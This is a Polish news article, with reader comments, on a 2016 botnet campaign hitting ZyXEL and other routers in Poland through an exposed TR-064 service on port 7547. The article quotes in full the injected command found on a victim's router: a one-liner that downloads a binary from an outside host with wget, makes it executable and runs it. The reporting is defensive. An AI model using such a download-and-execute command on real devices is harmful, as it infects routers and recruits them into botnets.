Na topie

Nowy bot atakuje routery w Polsce

Autor:

więcej artykułów ze strefy:
Bezpieczeństwo

Kategoria: Komputery Sieci Routery Bezpieczeństwo

Nawet kilkadziesiąt tysięcy routerów może paść ofiarą nowego cyberataku. Najlepszym sposobem obrony jest aktualizacja oprogramowania.

  • Nowy bot atakuje routery w Polsce
A A

Nawet kilkadziesiąt tysięcy użytkowników w Polsce (a konkretnie ich routerów) może być narażonych na cyberataki, mające na celu tworzenie botnetów wykorzystywanych później do niecnych celów. 

O całej sprawie poinformował serwis Zaufana Trzecia Strona, któremu o problemie doniósł jeden z użytkowników. Zaniepokojony restartami swojego routera sprawdził on konfigurację i dostrzegł w niej podejrzany wpis „cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2”. Laboratorium wspomnianego serwisu podjęło się analizie problemu i odkryło, że problem może być dość poważny.

Teoretycznie podatnych na atak urządzeń dostępowych (czyli takich z otwartym portem 7547 i usługą RomPager) jest ponad 65 tysięcy. Liczba ta pochodzi jednak z Shodana, co oznacza, że może zawierać częściowo nieaktualne dane. Aby router (przede wszystkim firmy ZyXEL) mógł paść ofiarą, muszą wystąpić dwie okoliczności, a mówiąc konkretnie: dwa błędy – zbyt szeroka dostępność protokołu TR-064 i możliwość wykonania poleceń powłoki. 

Dokładną analizę ataku znajdziecie w serwisie Zaufana Trzecia Strona.

Przed problemem można uchronić się w sposób prosty, a przez wiele osób niedoceniany. Mówimy tutaj o zwykłej aktualizacji oprogramowania urządzenia dostępowego. 

Źródło: Zaufana Trzecia Strona

Odsłon: 8175 Skomentuj newsa
Komentarze

13

Udostępnij
    1. cosby
      Oceń komentarz:

      19    

      Opublikowano: 2016-11-28 15:47

      Tak, a wielu chorób w tym psychicznych można uniknąć strzelając sobie w łeb :)

      Skomentuj

        1. Foxy the Pirate
          Oceń komentarz:

          11    

          Opublikowano: 2016-11-28 16:02

          Ucieczka od problemu niczego nie naprawia.

          Skomentuj

          1. kosiarz007
            Oceń komentarz:

            3    

            Opublikowano: 2016-11-28 19:21

            Aha, i jak się odwołasz z tym do pierwszego posta? Uciekasz odłączając ynternet i...?

            Skomentuj

          2. Sharimsejn
            Oceń komentarz:

            0    

            Opublikowano: 2016-11-29 14:17

            Przez chwilę myślałem, że to taki żart ale ty chyba poważnie. Nie sprawiaj byśmy tracili wiarę w ludzkość albo idź i nie wracaj.

            Skomentuj

    2. Satanski
      Oceń komentarz:

      2    

      Opublikowano: 2016-11-28 17:08

      Ja bym jeszcze dla pewności wykleił ściany folią aluminiową ;-)

      Skomentuj

  1. Tomecek
    Oceń komentarz:

    0    

    Opublikowano: 2016-11-28 15:55

    I właśnie dlatego mam router open source z Tomato firmware :)

    Skomentuj

      1. kitamo
        Oceń komentarz:

        -3    

        Opublikowano: 2016-11-28 17:12

        gdzie już domorosły haker zadbał o to by to open source było bardzo mocno open dla niego tez :D

        Skomentuj

      2. miedzianek
        Oceń komentarz:

        0    

        Opublikowano: 2016-11-28 23:48

        Linksys WRT54GL z softem Tomato, odpowiednia konfiguracja i NIKT ci się nie wbije

        Skomentuj

        1. Himoto
          Oceń komentarz:

          0    

          Opublikowano: 2016-11-29 10:51

          Z właścicielem do internetu włącznie x)

          Benchmark mogliście szerzej opisać to zagrożenie a nie "nic nie wiemy, ale napiszemy by zainteresować" taki click bait :|

          Skomentuj

          1. chitan
            Oceń komentarz:

            1    

            Opublikowano: 2016-11-29 13:47

            @Himoto

            Akurat Miedzianek ma 99% racji - bo 100 to tylko Utopia ;)

            Tomato na WRT54GL do tego hasło do sieci 63 znakowe (oczywiście duże i małe litery, cyfry, znaki specjalne), ukrywanie SSID, filtr na MAC + przydzielona pula adresów IP tylko dla określonej ilości urządzeń, nie zaczynająca się od 1 albo 0 i jeszcze kilka innych, ciekawych blokad. Router ustawiony raz, działał przez 4 lata bez "pierdnięcia". Niestety to tylko 100MBit i to w duplexie a jak się ma łącze 5 razy szybsze, to szkoda nie skorzystać.
            Następca tego modelu, czyli AC1900 to "łamaga". Aktualnie na rynku po za ASUS'ami nie ma sensownych routerów w tzw. mainstreamie. Jak potrafisz i wiesz co robić, to kupujesz Microtika, ale nawet kozak w te klocki po 4 godzinach konfiguracji rozpędza się i uderza głową w ścianę i .... zaczyna się uczyć obsługi konsolowej :D

            Skomentuj

          2. ZicoPL
            Oceń komentarz:

            1    

            Opublikowano: 2016-11-29 16:41

            wiedza jest, nie spodziewałem się na benchmarku takich komentujących. Jak Pasjonujesz się tym kierunkiem to można powymieniać się źródłami :) Masz jakąś swoją stronę bądź kontakt do siebie?
            btw. Microtik to zgrabne zabawki często spotykane na studiach :D profeski chodzą za 3 zera więcej ;P

            Skomentuj

          3. chitan
            Oceń komentarz:

            0    

            Opublikowano: 2016-11-29 22:35

            @ZicoPL dzięki za uznanie, rzadko komentuje, bo mi się nie chce potem gównoburzy roztrząsać. Co prawda parę razy wpadłem w wir dyskusji, ale po poziomie komentujących (nie mam na myśli ich zachowania) stwierdziłem, że bez sensu dyskutować. Hakrem też nie jestem ale 15 lat w branży robi swoje. Mój mail to jak login tutaj na benchmarku w domenie o2.pl ;) Jak masz ochotę coś pogadać to zapraszam.
            BTW 3 miechy temu robiłem jednego Mikrotika pod orange światłowód, taki za 2400 :) - to był właśnie ten, przy którym miałem ochotę wyrwać sobie włosy z głowy ale ich nie mam :P
            Bez dokumentów referencyjnych do Mikrotika [czyt. szkoleń] za wiele nie zdziałasz. Nawet znając unix i jego lekką odmianę pod takie urządzonka, czyli FreeBSD musisz znać strukturę. A jak dochodzi do tego Wifi to fiu fiu ... dobra rozmarzyłem się hehe InTouch

            Skomentuj

          4. ZicoPL
            Oceń komentarz:

            0    

            Opublikowano: 2016-12-02 20:03

            konfiguracja ich nigdy nie była prościzną :) wydajność energetyczna tez nie urywa ale mówimy przecież o urządzeniach nie koniecznie do domowego użytku ;)

            Skomentuj

Dodaj komentarz

Przy komentowaniu prosimy o przestrzeganie netykiety i regulaminu.

Aby dodać komentarz musisz być zalogowany!